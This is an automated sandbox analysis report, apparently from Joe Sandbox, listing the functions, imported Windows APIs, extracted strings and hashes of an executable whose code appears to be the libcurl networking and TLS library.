                                    • Opcode Fuzzy Hash: b0fc5a544a67f241d0388d02f82735fee0c2f6fbff4d75e53ed5b56293fc5d72
                                    • Instruction Fuzzy Hash: 2CC00236140308AFCF015F85DC05E997BAABB08711F448450BA1C5A171C772E5649B84
                                    Function 00E516BE Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000516D0,00E511D5), ref: 00E516C3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: f36f63b3fe1adebcb3459a4b804fb45c616a2d2ddd6c2ad8fbda6ea3fd6bcbae
                                    • Instruction ID: 4b67eee12c5633e497da22e28d71db6e83dcd7f29e2c28762ec52c762f985200
                                    • Opcode Fuzzy Hash: f36f63b3fe1adebcb3459a4b804fb45c616a2d2ddd6c2ad8fbda6ea3fd6bcbae
                                    • Instruction Fuzzy Hash:
                                    Function 00E533B0 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: ed44505f7259a9837172f65714c887d0f88528556a9373b66b6feb0fea1fd6f8
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: F8113B7B30008143D606CA3DD4B45B79796EAC53AB72C6B7AD8619F644D632DB4D9500
                                    Function 00E1A216 Relevance: 161.3, APIs: 7, Strings: 85, Instructions: 271stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000), ref: 00E1A230
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A238
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 00E1A62C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A63C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A64C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A654
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A65F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast_errno$strncpy
                                    • String ID: %s (0x%08X)$%s - %s$0kv@qv@/lv$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                    • API String ID: 4135170618-3520528184
                                    • Opcode ID: f89884568bb39a0aec85f0023b59817ae4228140d832c4359b2597c4ab3c0662
                                    • Instruction ID: 60d648e9da84b39dc26ed74123bfb8fb4b3f58fe3e41169ae992a2f5ddfcd069
                                    • Opcode Fuzzy Hash: f89884568bb39a0aec85f0023b59817ae4228140d832c4359b2597c4ab3c0662
                                    • Instruction Fuzzy Hash: EA81FEB178E2C8D78314076C69069FD6556E791388B6C7232B602FFB81D961CEC4B313
                                    Function 00E0245C Relevance: 95.3, APIs: 76, Instructions: 282COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02464
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02472
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0247E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0248A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02496
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024AA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024BE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024CA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024D9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024EB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0250F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02521
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02533
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02545
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02557
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0256C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0257E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02590
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025A2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025B4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025C6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025D8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025EA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025FC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0260E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02620
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0263D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0264F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02661
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0267F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0268C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02699
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026D1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026E3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026F5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02707
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02719
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0272B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0273D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0274F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02761
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02773
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02785
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02797
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027A9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027BB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027CD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02806
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02818
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0282A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0283C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0284E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02860
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02872
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02884
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02896
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028A8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028BA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028CC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028DE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028F0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02902
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02917
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02929
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0293B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0294A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E029D9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E029EB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E029FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02A0F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02A21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02A33
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 1c390634fd37a256f4a76de48cbb1b86579d067c2b52dd15b710a27e4be96496
                                    • Instruction ID: 1a5aecede946716c33201d2bb4136b6411f974e03f8788ea69ee97ee4a076599
                                    • Opcode Fuzzy Hash: 1c390634fd37a256f4a76de48cbb1b86579d067c2b52dd15b710a27e4be96496
                                    • Instruction Fuzzy Hash: B4F12E7A602F12EFCB4A5FA1D858A89FB71BF08702F008606F92D66221CB352575DFC5
                                    Function 00E43B1A Relevance: 92.8, APIs: 4, Strings: 49, Instructions: 66stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000000,?,0000001F), ref: 00E43B39
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,USE_STRONG_CRYPTO,00000011,0000001F), ref: 00E43B59
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,SCH_USE_STRONG_CRYPTO,00000015,?,?,?,0000001F), ref: 00E43B6E
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E43B8E
                                      • Part of subcall function 00E43B1A: ___from_strstr_to_strchr.LIBCMT ref: 00E4345C
                                      • Part of subcall function 00E43B1A: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 00E4349C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrstrncmp$strncpystrtol
                                    • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
                                    • API String ID: 3873730638-2313236003
                                    • Opcode ID: d659c02b8d0312cba315c5ef081b3d93cda04dd246483d95afd9f05000187aa1
                                    • Instruction ID: 5a7615c203fcad02b900c1073f18a8364f093268007a9ed93f76f0a22b49f820
                                    • Opcode Fuzzy Hash: d659c02b8d0312cba315c5ef081b3d93cda04dd246483d95afd9f05000187aa1
                                    • Instruction Fuzzy Hash: D8114832B41F106BD7395A35BC95B96778CCF417ADF102025ED05FA682E7608F4182C5
                                    Function 00E0A5C4 Relevance: 92.8, APIs: 4, Strings: 49, Instructions: 56stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0A600
                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 00E0A637
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0A641
                                    • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00E0A649
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_errnoioctlsocketstrerror
                                    • String ID: %s%c%s$0kv@qv@/lv$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Ph'$Pl$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$V;J$VLI$V[J$ViI$VI$VJ$fcntl failed on fd=%d: %s$h+N$h,N$h0"$ht'$http://$https://$proxy support is disabled in this libcurl$k%$wJ
                                    • API String ID: 1657940537-1709016624
                                    • Opcode ID: f8cfe1daa819f34ff9f451f71aae789f0ebd6458bb11fa59fa1f615c93735b2a
                                    • Instruction ID: 38df11a7c0f54d244b218fd7dbaa18a6139d01d9ff8611d0f96ac8b3309c9ce3
                                    • Opcode Fuzzy Hash: f8cfe1daa819f34ff9f451f71aae789f0ebd6458bb11fa59fa1f615c93735b2a
                                    • Instruction Fuzzy Hash: 7E110671A017099FEF089F70DD55AAC7BB1FF45319F186029E805F60D2DB359CC58A42
                                    Function 00E19CA8 Relevance: 76.6, APIs: 1, Strings: 50, Instructions: 140stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Host not found,000000FF,?,00E1A10B), ref: 00E19EF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncpy
                                    • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                    • API String ID: 3301158039-3442644082
                                    • Opcode ID: df247525194e90a5083d25bff3a5d3755ccf6bbb4cc3fcab5e8fba7f1d1e0264
                                    • Instruction ID: 62532a780c86040949ab71623f91f0620bc0225a38437c8f47edaa166d22f8e6
                                    • Opcode Fuzzy Hash: df247525194e90a5083d25bff3a5d3755ccf6bbb4cc3fcab5e8fba7f1d1e0264
                                    • Instruction Fuzzy Hash: 3D41643168C241928738C57CA63A1F195D4EB91381B28726EB443FB79FD153EEC2B752
                                    Function 00E4E652 Relevance: 52.9, APIs: 13, Strings: 22, Instructions: 447COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00E4E702
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4E766
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EB75
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EBBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
                                    • API String ID: 1294909896-2896079655
                                    • Opcode ID: 797174f978c488318a700aa764dbbb15176f1aeb982c08b08c886c1c5a76ae95
                                    • Instruction ID: 80638a2324ed68e9b692f165a667a6faa690abd8ac633c1e4d3648b03f7a443a
                                    • Opcode Fuzzy Hash: 797174f978c488318a700aa764dbbb15176f1aeb982c08b08c886c1c5a76ae95
                                    • Instruction Fuzzy Hash: 29E1C0316483169FD728AB20F89592FB7D5FF84764F14992EE845B3351EB709C088B92
                                    Function 00E0686E Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 382fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0688D
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E068A1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00E068C1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E068F7
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0691B
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0697E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06988
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00E58DD4), ref: 00E0699E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E069DA
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E069E6
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E06A30
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06A7A
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06A96
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06AC9
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E06AD9
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E06AF9
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E58DD4), ref: 00E06B14
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E06B7F
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E06BD0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E06C50
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E06C58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
